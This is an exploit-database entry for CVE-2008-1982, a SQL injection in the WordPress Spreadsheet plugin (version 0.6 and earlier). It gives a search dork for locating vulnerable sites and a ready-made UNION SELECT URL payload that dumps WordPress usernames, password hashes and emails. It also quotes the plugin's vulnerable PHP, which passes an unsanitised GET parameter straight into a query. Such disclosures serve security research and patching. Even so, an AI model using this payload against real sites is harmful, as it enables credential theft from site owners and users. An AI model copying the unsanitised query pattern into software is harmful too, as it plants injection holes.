WordPress Plugin Spreadsheet <= 0.6 - SQL Injection Vulnerability

2008-04-22T00:00:00
ID EDB-ID:5486
Type exploitdb
Reporter 1ten0.0net1
Modified 2008-04-22T00:00:00

Description

Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability. CVE-2008-1982. Webapps exploit for php platform

                                        
                                            ===========================================
There's standart sql-injection in Spreadsheet &lt;= 0.6 Plugin
# Author : 1ten0.0net1
# Script : Wordpress Plugin Spreadsheet &lt;= 0.6 v.
# Download : http://timrohrer.com/blog/?page_id=71
# BUG :  Remote SQL-Injection Vulnerability
# Dork : inurl:/wp-content/plugins/wpSS/
Example:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
===========================================
Vulnerable code:
ss_load.php
    $id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
    if ($wpdb-&gt;query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....

==&gt; Visit us @ forum.antichat.ru

# milw0rm.com [2008-04-22]